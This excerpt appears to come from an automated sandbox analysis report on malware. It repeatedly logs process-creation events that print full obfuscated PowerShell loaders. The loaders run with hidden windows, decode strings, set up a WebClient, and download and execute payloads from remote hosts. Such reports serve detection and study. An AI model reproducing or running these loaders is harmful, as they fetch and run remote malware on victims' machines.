R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$Ovg
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') 